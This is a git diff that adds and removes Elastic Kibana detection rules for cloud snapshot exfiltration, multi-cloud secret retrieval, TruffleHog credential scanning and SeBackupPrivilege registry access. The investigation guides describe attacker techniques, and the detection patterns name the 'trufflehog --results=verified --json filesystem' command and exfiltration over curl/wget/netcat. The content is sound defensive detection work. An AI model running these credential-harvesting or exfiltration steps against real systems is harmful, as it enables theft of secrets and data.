a/packages/security_detection_engine/kibana/security_rule/4577ef08-61d1-4458-909f-25a4b10c87fe_6.json b/packages/security_detection_engine/kibana/security_rule/4577ef08-61d1-4458-909f-25a4b10c87fe_6.json new file mode 100644 index 00000000000..ddf0f0c07c9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4577ef08-61d1-4458-909f-25a4b10c87fe_6.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when an AWS RDS DB snapshot is shared with another AWS account or made public. DB snapshots contain complete backups of database instances, including schemas, table data, and sensitive application content. When shared externally, snapshots can be restored in another AWS environment, enabling unauthorized access, offline analysis, or data exfiltration. Adversaries who obtain valid credentials or exploit misconfigurations may modify snapshot attributes to grant access to accounts they control, bypassing network, IAM, and monitoring controls.", + "event_category_override": "event.type", + "false_positives": [ + "Cross-account DB snapshot sharing is common in multi-account AWS Organizations, particularly for backup workflows, migrations, analytics pipelines, and disaster recovery. Ensure the added account is expected, previously approved, and aligns with operational change plans before taking action." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "target.entity.id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS RDS DB Snapshot Shared with Another Account", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS RDS DB Snapshot Shared with Another Account\n\nAmazon RDS DB snapshots capture full backups of database instances and clusters. Modifying a snapshot\u2019s restore\nattributes to include external AWS accounts allows those accounts to restore and fully access the underlying data.\nWhile cross-account snapshot sharing is widely used for migrations and disaster-recovery workflows, adversaries may\nabuse this mechanism for stealthy data exfiltration, restoring the snapshot in infrastructure they control, outside of your monitoring boundary.\n\nThis rule detects successful modifications to snapshot attributes where one or more additional AWS accounts are added to the snapshot\u2019s restore permissions.\n\n#### Possible investigation steps\n\n- **Identify the actor and context**\n - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id`.\n - Determine whether the caller is an automation role, interactive user, CI/CD pipeline, or previously unseen principal.\n - Check `source.ip` and `user_agent.original` for signs of unauthorized access or atypical tooling.\n\n- **Understand what snapshot was shared**\n - From `aws.cloudtrail.request_parameters`, extract:\n - The snapshot or cluster snapshot identifier.\n - The list of `valuesToAdd` accounts added to `attributeName=restore`.\n - Identify the associated database instance or cluster and evaluate:\n - Data classification level (PII, customer data, secrets, credentials, financials, etc.)\n - Application ownership and business impact.\n\n- **Validate the external account**\n - Determine whether the recipient account:\n - Belongs to your AWS Organization.\n - Has previously been authorized for snapshot restore operations.\n - Represents a new or unexpected dependency.\n - Cross-reference with known partner accounts or migration plans.\n\n- **Correlate with related activity**\n - Pivot in CloudTrail on the same user identity or account to identify:\n - Prior reconnaissance actions (`DescribeDBSnapshots`, `DescribeDBInstances`).\n - Snapshot copying or creation of manual snapshots just before sharing.\n - IAM privilege escalation (`AttachRolePolicy`, `PutUserPolicy`, `AssumeRole` patterns).\n - Unusual RDS configuration changes (backup retention decrease, deletion protection toggles).\n\n- **Assess for exfiltration indicators**\n - Look for:\n - Subsequent `CopyDBSnapshot` or `StartExportTask` events.\n - Snapshot downloads, exports, or restoration from the external account.\n - Snapshot attributes set to `all` (public sharing), which is extremely dangerous.\n\n- **Validate operational intent**\n - Contact application owners, DBAs, or platform teams to confirm:\n - Whether migration, replication, or DR workflows explain the share.\n - Whether new accounts were intentionally onboarded.\n - Whether the timing aligns with approved change windows.\n\n### False positive analysis\n\n- **Legitimate migration or DR workflows**\n - Many organizations routinely share snapshots with other accounts for staging, analytics, or DR replication.\n\n- **Automation roles**\n - Infrastructure-as-code pipelines and backup automation tools may modify snapshot permissions as part of normal behavior.\n\nIf behavior is expected and consistently performed by a known principal, tune the rule using exceptional user identities, service roles, or controlled organizational accounts.\n\n### Response and remediation\n\n- **Revoke unauthorized sharing**\n - Immediately remove unauthorized accounts from snapshot restore attributes.\n - Ensure the snapshot is not publicly shared.\n\n- **Contain potential compromise**\n - Rotate access keys or credentials for the principal that performed the modification.\n - Review IAM permissions to ensure only approved roles can share snapshots.\n\n- **Assess impact**\n - Determine whether the external account restored the snapshot and accessed data.\n - If data exposure is likely, notify compliance, legal, and incident response teams.\n\n- **Hardening and preventive controls**\n - Restrict snapshot sharing via IAM condition keys (`kms:ViaService`, `rds:dbSnapshotArn`, `aws:PrincipalArn`).\n - Use AWS Organizations SCPs to block cross-account snapshot sharing in production accounts.\n - Enable Config rules and Security Hub controls for public or cross-account snapshot access.\n\n### Additional information\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "info where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"rds.amazonaws.com\"\n and event.outcome == \"success\"\n and event.action in (\"ModifyDBSnapshotAttribute\", \"ModifyDBClusterSnapshotAttribute\")\n and stringContains(aws.cloudtrail.request_parameters, \"attributeName=restore\")\n and stringContains(aws.cloudtrail.request_parameters, \"valuesToAdd=[*]\")\n", + "references": [ + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBSnapshotAttribute.html", + "https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html", + "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation#rds-modifydbsnapshotattribute-rds-createdbsnapshot" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4577ef08-61d1-4458-909f-25a4b10c87fe", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "4577ef08-61d1-4458-909f-25a4b10c87fe_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json b/packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json new file mode 100644 index 00000000000..beba50d2044 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json @@ -0,0 +1,184 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects authenticated sessions accessing secret stores across multiple cloud providers from the same source address within a short period of time. Adversaries with access to compromised credentials or session tokens may attempt to retrieve secrets from services such as AWS Secrets Manager, Google Secret Manager, or Azure Key Vault in rapid succession to expand their access or exfiltrate sensitive information.", + "from": "now-9m", + "interval": "5m", + "language": "esql", + "license": "Elastic License v2", + "name": "Multiple Cloud Secrets Accessed by Source Address", + "note": "## Triage and analysis\n\n### Multiple Cloud Secrets Accessed by Source Address\n\nThis alert identifies a single source IP address accessing secret-management APIs across **multiple cloud providers**\n(e.g., AWS Secrets Manager, Google Secret Manager, Azure Key Vault) within a short timeframe.\nThis behavior is strongly associated with **credential theft, session hijacking, or token replay**, where an adversary\nuses stolen authenticated sessions to harvest secrets across cloud environments.\n\nUnexpected cross-cloud secret retrieval is uncommon and typically indicates automation misuse or malicious activity.\n\n### Possible investigation steps\n\n- Validate the principal\n - Identify the user, service account, workload identity, or application making the requests.\n - Confirm whether this identity is expected to operate across more than one cloud provider.\n- Review related activity\n - Look for additional alerts involving the same identity, source IP, or token over the last 24\u201348 hours.\n - Identify whether the source IP has been observed performing unusual authentication, privilege escalation,\n or reconnaissance.\n- Check application or service context\n - Determine whether any workload legitimately pulls secrets from multiple cloud providers.\n - Review deployment pipelines or integration layers that might legitimately bridge AWS, Azure, and GCP.\n- Analyze user agent and invocation patterns\n - Compare `user_agent.original` or equivalent fields against expected SDKs or automation tools.\n - Suspicious indicators include CLI tools, unknown libraries, browser user agents, or custom scripts.\n- Inspect IP reputation and origin\n - Determine whether the source IP corresponds to a managed workload (EC2, GCE, Azure VM) or an unexpected host.\n - Validate that the associated instance or host is under your control and behaving normally.\n- Review IAM permissions and accessed secrets\n - Check the policies attached to the identity.\n - Verify whether the accessed secrets are sensitive, unused, or unrelated to the identity\u2019s purpose.\n- Assess potential compromise scope\n - If compromise is suspected, enumerate other assets accessed by the same identity in the last 24 hours.\n - Look for lateral movement, privilege escalation, or abnormal API usage.\n\n### False positive analysis\n\n- Validate whether the source IP is associated with a legitimate multi-cloud orchestration tool, automation pipeline,\n or shared CI/CD system.\n- Confirm that the identity is authorized to access secrets across multiple cloud services.\n- If activity is expected, consider adding exceptions that pair account identity, source IP, and expected user agent\n to reduce noise.\n\n### Response and remediation\n\n- Initiate incident response** if the activity is unauthorized or suspicious.\n- Restrict or disable** the affected credentials or service accounts.\n- Rotate all accessed secrets** and review other secrets the identity can access.\n- Analyze systems** that may have leaked credentials, such as compromised hosts or exposed tokens.\n- Harden identity security:\n - Enforce MFA for users where applicable.\n - Reduce permissions to least privilege.\n - Review trust relationships, workload identities, and cross-cloud integrations.\n- Search for persistence mechanisms** such as newly created keys, roles, or service accounts.\n- Improve monitoring and audit visibility** by ensuring logging is enabled across all cloud environments.\n- Determine root cause** (phishing, malware, token replay, exposed credential, etc.) and close the vector to prevent recurrence.\n", + "query": "FROM logs-azure.platformlogs-*, logs-azure.activitylogs-*, logs-aws.cloudtrail-*, logs-gcp.audit-* METADATA _id, _version, _index\n| WHERE \n ( \n /* AWS Secrets Manager */ \n (event.dataset == \"aws.cloudtrail\" AND event.provider == \"secretsmanager.amazonaws.com\" AND event.action == \"GetSecretValue\") OR \n // Azure Key Vault (platform logs)\n (event.dataset == \"azure.platformlogs\" AND event.action IN (\"SecretGet\", \"KeyGet\")) or \n /* Azure Key Vault (activity logs) */ \n (event.dataset == \"azure.activitylogs\" AND azure.activitylogs.operation_name IN (\"MICROSOFT.KEYVAULT/VAULTS/SECRETS/LIST\", \"MICROSOFT.KEYVAULT/VAULTS/SECRETS/GET\")) OR \n /* Azure Managed HSM secret */ \n (event.dataset == \"azure.activitylogs\" AND azure.activitylogs.operation_name LIKE \"MICROSOFT.KEYVAULT/managedHSM/keys/*\") OR \n /* Google Secret Manager */ \n (event.dataset IN (\"googlecloud.audit\", \"gcp.audit\") AND \n event.action IN (\"google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion\", \"google.cloud.secretmanager.v1.SecretManagerService.GetSecretRequest\"))\n ) AND source.ip IS NOT NULL\n// Unified user identity (raw)\n| EVAL Esql_priv.user_id =\n COALESCE(\n client.user.id,\n aws.cloudtrail.user_identity.arn,\n azure.platformlogs.identity.claim.upn,\n NULL\n )\n// Cloud vendor label based on dataset\n| EVAL Esql.cloud_vendor = CASE(\n event.dataset == \"aws.cloudtrail\", \"aws\",\n event.dataset IN (\"azure.platformlogs\",\"azure.activitylogs\"), \"azure\",\n event.dataset IN (\"googlecloud.audit\",\"gcp.audit\"), \"gcp\",\n \"unknown\"\n )\n// Vendor+tenant label, e.g. aws:123456789012, azure:tenant, gcp:project\n| EVAL Esql.tenant_label = CASE(\n Esql.cloud_vendor == \"aws\", CONCAT(\"aws:\", cloud.account.id),\n Esql.cloud_vendor == \"azure\", CONCAT(\"azure:\", cloud.account.id),\n Esql.cloud_vendor == \"gcp\", CONCAT(\"gcp:\", cloud.account.id),\n NULL\n )\n| STATS\n // Core counts\n Esql.events_count = COUNT(*),\n Esql.vendor_count_distinct = COUNT_DISTINCT(Esql.cloud_vendor),\n // Action & data source context\n Esql.event_action_values = VALUES(event.action),\n Esql.data_source_values = VALUES(event.dataset),\n // Cloud vendor + tenant context\n Esql.cloud_vendor_values = VALUES(Esql.cloud_vendor),\n Esql.tenant_label_values = VALUES(Esql.tenant_label),\n // Hyperscaler-specific IDs\n Esql.aws_account_id_values = VALUES(CASE(Esql.cloud_vendor == \"aws\", cloud.account.id, NULL)),\n Esql.azure_tenant_id_values = VALUES(CASE(Esql.cloud_vendor == \"azure\", cloud.account.id, NULL)),\n Esql.gcp_project_id_values = VALUES(CASE(Esql.cloud_vendor == \"gcp\", cloud.account.id, NULL)),\n // Generic cloud metadata\n Esql.cloud_region_values = VALUES(cloud.region),\n Esql.cloud_service_name_values = VALUES(cloud.service.name),\n // Identity (privileged)\n Esql_priv.user_values = VALUES(Esql_priv.user_id),\n Esql_priv.client_user_id_values = VALUES(client.user.id),\n Esql_priv.aws_user_identity_arn_values = VALUES(aws.cloudtrail.user_identity.arn),\n Esql_priv.azure_upn_values = VALUES(azure.platformlogs.identity.claim.upn),\n // Namespace values\n Esql.data_stream_namespace_values = VALUES(data_stream.namespace)\n BY source.ip\n// Require multi-vendor cred-access from same source IP\n| WHERE Esql.vendor_count_distinct >= 2\n| SORT Esql.events_count DESC\n| KEEP Esql.*, Esql_priv.*, source.ip\n", + "references": [ + "https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html", + "https://docs.cloud.google.com/secret-manager/docs/samples/secretmanager-access-secret-version", + "https://learn.microsoft.com/en-us/azure/key-vault/secrets/about-secrets", + "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + }, + { + "package": "gcp", + "version": "^2.41.0" + }, + { + "package": "azure", + "version": "^1.22.0" + }, + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + }, + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.22.0" + }, + { + "integration": "platformlogs", + "package": "azure", + "version": "^1.22.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.aws_account_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.azure_tenant_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.cloud_region_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.cloud_service_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.cloud_vendor_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_source_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_action_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.events_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.gcp_project_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.tenant_label_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.vendor_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql_priv.aws_user_identity_arn_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql_priv.azure_upn_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql_priv.client_user_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql_priv.user_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 73, + "rule_id": "472b4944-d810-43cf-83dc-7d080ae1b8dd", + "setup": "This multi-datasource rule relies on additional configurations from each hyperscaler.\n\n- GCP Audit: [Enable DATA_READ for the Secret Manager API service](https://docs.cloud.google.com/logging/docs/audit/configure-data-access)\n- Azure: [Enable Diagnostic Logging for the Key Vault Service](https://learn.microsoft.com/en-us/azure/key-vault/general/howto-logging?tabs=azure-cli)\n- AWS: Secrets Manager read access is automatically logged by CloudTrail.\n", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Domain: IAM", + "Domain: Storage", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Secrets Manager", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Data Source: GCP", + "Data Source: Google Cloud Platform", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.006", + "name": "Cloud Secrets Management Stores", + "reference": "https://attack.mitre.org/techniques/T1555/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 1 + }, + "id": "472b4944-d810-43cf-83dc-7d080ae1b8dd_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/47595dea-452b-4d37-b82d-6dd691325139_2.json b/packages/security_detection_engine/kibana/security_rule/47595dea-452b-4d37-b82d-6dd691325139_2.json new file mode 100644 index 00000000000..6800ca5c1c4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/47595dea-452b-4d37-b82d-6dd691325139_2.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the execution of TruffleHog, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials. This tool was abused by the Shai-Hulud worm to search for credentials in code repositories.", + "false_positives": [ + "Trufflehog is a legitimate open-source tool used by security professionals and developers to search for sensitive information, such as passwords, API keys, and other secrets, within code repositories. It is commonly employed during security assessments and code reviews to identify potential vulnerabilities." + ], + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Credential Access via TruffleHog Execution", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Credential Access via TruffleHog Execution\n\nThis rule flags TruffleHog executed to scan the local filesystem with verified JSON results, a direct path to harvesting secrets from source code, configs, and build artifacts. Attackers gain shell access on a developer workstation or CI runner, clone or point to internal repositories, run 'trufflehog --results=verified --json filesystem .' to enumerate valid tokens, and then pivot using the recovered keys to pull private code or authenticate to cloud and CI/CD systems.\n\n### Possible investigation steps\n\n- Review binary path, code signature/hash, parent process chain, initiating user, and host role (developer workstation vs CI runner) to quickly decide if the execution matches an approved secret-scanning job or an ad\u2011hoc run.\n- Determine the working directory and target path used by the scan to identify which repositories or configuration directories were inspected and whether sensitive files (e.g., .env, deployment keys, build secrets) were in scope.\n- Pivot to same-session activity to spot credential use or exfiltration by correlating subsequent outbound connections to git remotes or cloud/CI APIs and launches of developer CLIs like git, gh, aws, az, gcloud, docker, kubectl, or vault.\n- Look for output artifacts and exfil channels by checking for creation or deletion of JSON reports or archives, clipboard access, or piping of results to curl/wget/netcat and whether those artifacts were emailed or uploaded externally.\n- Cross-check VCS and CI/CD audit logs for this identity and host for unusual pushes, pipeline changes, or new tokens issued shortly after the scan, which may indicate worm-like propagation or credential abuse.\n\n### False positive analysis\n\n- An approved secret-scanning task by a developer or security engineer runs trufflehog with --results=verified --json filesystem to audit local code and configuration, producing benign activity on a development host.\n- An internal automation or scheduled job invokes trufflehog to baseline filesystem secrets for compliance or hygiene checks, leading to expected process-start logs without credential abuse.\n\n### Response and remediation\n\n- Immediately isolate the host or CI runner, terminate the trufflehog process and its parent shell/script, and block egress to git remotes and cloud APIs from that asset.\n- Collect the verified findings from trufflehog output (stdout or JSON file), revoke and rotate any listed secrets (GitHub personal access tokens, AWS access keys, Azure service principal credentials, CI job tokens), and clear credential caches on the host.\n- Remove unauthorized trufflehog binaries/packages, helper scripts, and scheduled tasks; delete report files and scanned working directories (local repo clones, .env/config folders), and purge shell history containing exfil commands like curl/wget/netcat.\n- Restore the workstation or runner from a known-good image if tampering is suspected, re-enroll endpoint protection, reissue required developer or CI credentials with least privilege, and validate normal pulls to internal git and cloud services.\n- Escalate to full incident response if trufflehog ran under a service account, on a build server/CI runner, or if any discovered secret was used to authenticate to external git remotes (e.g., github.com), cloud APIs, or private registries in the same session.\n- Harden by blocking unapproved trufflehog execution via application control, moving approved secret scanning to a locked-down pipeline, enforcing short-lived PATs and key rotation, enabling egress filtering from developer hosts/runners, and deploying fleet-wide detections for \"trufflehog --results=verified --json filesystem\".\n", + "query": "process where event.type == \"start\" and process.name : (\"trufflehog.exe\", \"trufflehog\") and\nprocess.args == \"--json\" and process.args == \"filesystem\"\n", + "references": [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://socket.dev/blog/shai-hulud-strikes-again-v2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.18.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "47595dea-452b-4d37-b82d-6dd691325139", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Auditd Manager", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "47595dea-452b-4d37-b82d-6dd691325139_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_213.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_213.json deleted file mode 100644 index 8e009419cd6..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_213.json +++ /dev/null @@ -1,129 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Suspicious Remote Registry Access via SeBackupPrivilege", - "note": "## Triage and analysis\n\n### Investigating Suspicious Remote Registry Access via SeBackupPrivilege\n\nSeBackupPrivilege is a privilege that allows file content retrieval, designed to enable users to create backup copies of the system. Since it is impossible to make a backup of something you cannot read, this privilege comes at the cost of providing the user with full read access to the file system. This privilege must bypass any access control list (ACL) placed in the system.\n\nThis rule identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the activities done by the subject user the login session. The field `winlog.event_data.SubjectLogonId` can be used to get this data.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate abnormal behaviors observed by the subject user such as network connections, registry or file modifications, and processes created.\n- Investigate if the registry file was retrieved or exfiltrated.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Limit or disable the involved user account to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan=1m\n [iam where event.action == \"logged-in-special\" and\n winlog.event_data.PrivilegeList : \"SeBackupPrivilege\" and\n\n /* excluding accounts with existing privileged access */\n not winlog.event_data.PrivilegeList : \"SeDebugPrivilege\"]\n [any where event.code == \"5145\" and winlog.event_data.RelativeTargetName : \"winreg\"]\n", - "references": [ - "https://github.com/mpgn/BackupOperatorToDA", - "https://raw.githubusercontent.com/Wh04m1001/Random/main/BackupOperators.cpp", - "https://www.elastic.co/security-labs/detect-credential-access" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.PrivilegeList", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.RelativeTargetName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectLogonId", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", - "setup": "## Setup\n\nThe 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1003", - "name": "OS Credential Dumping", - "reference": "https://attack.mitre.org/techniques/T1003/", - "subtechnique": [ - { - "id": "T1003.002", - "name": "Security Account Manager", - "reference": "https://attack.mitre.org/techniques/T1003/002/" - }, - { - "id": "T1003.004", - "name": "LSA Secrets", - "reference": "https://attack.mitre.org/techniques/T1003/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/" - } - ] - } - ], - "type": "eql", - "version": 213 - }, - "id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2_213", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_111.json b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_111.json index 9eefc8aafbc..7113a9a3873 100644 